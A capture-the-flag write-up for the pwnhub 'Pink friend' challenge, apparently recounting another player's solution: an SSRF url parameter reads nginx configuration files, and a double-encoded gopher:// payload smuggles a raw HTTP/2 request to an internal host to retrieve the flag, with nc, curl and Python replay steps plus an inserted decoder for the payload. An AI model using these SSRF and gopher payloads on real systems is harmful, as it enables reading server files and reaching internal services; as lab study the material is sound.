PWNHUB-Pink friend
2019-01-31 01:19:38

I read f1sh's writeup, "pwnhub Pink friend Writeup", Orz! The approach is really clever, so I am recording the key steps here.

url=file:///etc/nginx/nginx.conf

url=file:///etc/nginx/sites-enabled/default

Use gopher to craft an HTTP/2 request to 172.20.0.3:8080. First, listen locally to capture an HTTP/2 request packet:

nc -lvvp 8000>1.txt

curl --http2-prior-knowledge: speaks HTTP/2 from the start, without the HTTP/1.1 Upgrade step.

$ curl --http2-prior-knowledge http://127.0.0.1:8000/

Construct the gopher request:

gopher://172.20.0.3:8080/_PRI%2520%252A%2520HTTP/2.0%250D%250A%250D%250ASM%250D%250A%250D%250A%2500%2500%2512%2504%2500%2500%2500%2500%2500%2500%2503%2500%2500%2500d%2500%2504%2540%2500%2500%2500%2500%2502%2500%2500%2500%2500%2500%2500%2504%2508%2500%2500%2500%2500%2500%253F%25FF%2500%2501%2500%2500%251E%2501%2505%2500%2500%2500%2501%2582%2584%2586A%258A%2508%259D%255C%250B%2581p%25DCx%2501%2517z%2588%2525%25B6P%25C3%25AB%25B8%25CA%25E0S%2503%252A/%252A
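As an added example (not code from this post or from f1sh's writeup), the following Python 3 script decodes the gopher URL above back into the HTTP/2 connection preface and the frames it carries, which is the quickest way to review what such a payload would actually send to the internal service. It assumes the payload exactly as written above and decodes only the frame headers plus the SETTINGS and WINDOW_UPDATE bodies, not the HPACK header block.

```python
import struct
from urllib.parse import unquote_to_bytes

# The gopher URL from this writeup, split at HTTP/2 frame boundaries for readability.
GOPHER_URL = (
    "gopher://172.20.0.3:8080/_"
    "PRI%2520%252A%2520HTTP/2.0%250D%250A%250D%250ASM%250D%250A%250D%250A"  # connection preface
    "%2500%2500%2512%2504%2500%2500%2500%2500%2500"  # SETTINGS frame header (len 18, stream 0)
    "%2500%2503%2500%2500%2500d%2500%2504%2540%2500%2500%2500%2500%2502%2500%2500%2500%2500"
    "%2500%2500%2504%2508%2500%2500%2500%2500%2500%253F%25FF%2500%2501"  # WINDOW_UPDATE
    "%2500%2500%251E%2501%2505%2500%2500%2500%2501"  # HEADERS frame header (len 30, stream 1)
    "%2582%2584%2586A%258A%2508%259D%255C%250B%2581p%25DCx%2501%2517z"  # HPACK header block
    "%2588%2525%25B6P%25C3%25AB%25B8%25CA%25E0S%2503%252A/%252A"
)
PREFACE = b"PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n"
FRAME_TYPES = {0: "DATA", 1: "HEADERS", 4: "SETTINGS", 8: "WINDOW_UPDATE"}


def gopher_to_bytes(url):
    """Drop the scheme/host and the gopher '_' type selector, then URL-decode
    twice, because the writeup double-encodes the payload."""
    payload = url.split("/_", 1)[1]
    return unquote_to_bytes(unquote_to_bytes(payload))


def parse_h2_frames(raw):
    """Return (preface_ok, frames); each frame holds the 9-byte header fields
    (length, type, flags, stream id) plus decoded SETTINGS/WINDOW_UPDATE payloads."""
    if not raw.startswith(PREFACE):
        return False, []
    pos, frames = len(PREFACE), []
    while pos + 9 <= len(raw):
        length = int.from_bytes(raw[pos:pos + 3], "big")
        ftype, flags = raw[pos + 3], raw[pos + 4]
        stream_id = struct.unpack(">I", raw[pos + 5:pos + 9])[0] & 0x7FFFFFFF  # clear R bit
        payload = raw[pos + 9:pos + 9 + length]
        frame = {"type": FRAME_TYPES.get(ftype, ftype), "flags": flags,
                 "stream": stream_id, "payload": payload}
        if frame["type"] == "SETTINGS":  # payload is a list of (16-bit id, 32-bit value)
            frame["settings"] = dict(struct.unpack(">HI", payload[i:i + 6])
                                     for i in range(0, len(payload), 6))
        elif frame["type"] == "WINDOW_UPDATE":
            frame["increment"] = struct.unpack(">I", payload)[0] & 0x7FFFFFFF
        frames.append(frame)
        pos += 9 + length
    return True, frames
```

Running parse_h2_frames(gopher_to_bytes(GOPHER_URL)) yields a SETTINGS frame (ids 3, 4, 2 set to 100, 0x40000000 and 0), a WINDOW_UPDATE of 0x3FFF0001, and a 30-byte HEADERS frame on stream 1 with flags 0x5 (END_HEADERS | END_STREAM), i.e. exactly what curl sends for a prior-knowledge GET.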

Then save the returned data to a file, flag.txt. To decode the data just returned, replay the HTTP/2 request exchange:

nc -lvvp 8000 < flag.txt

You can also start a socket server with Python, as f1sh did.

import socket

# Serve the raw HTTP/2 response saved in flag.txt to every client that
# connects, so a local curl can decode it.
a = open("flag.txt", "rb").read()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
host = '127.0.0.1'
port = 8000
s.bind((host, port))

s.listen(5)
while True:
    c, addr = s.accept()
    c.sendall(a)
    c.close()
curl --http2-prior-knowledge http://127.0.0.1:8000 -v
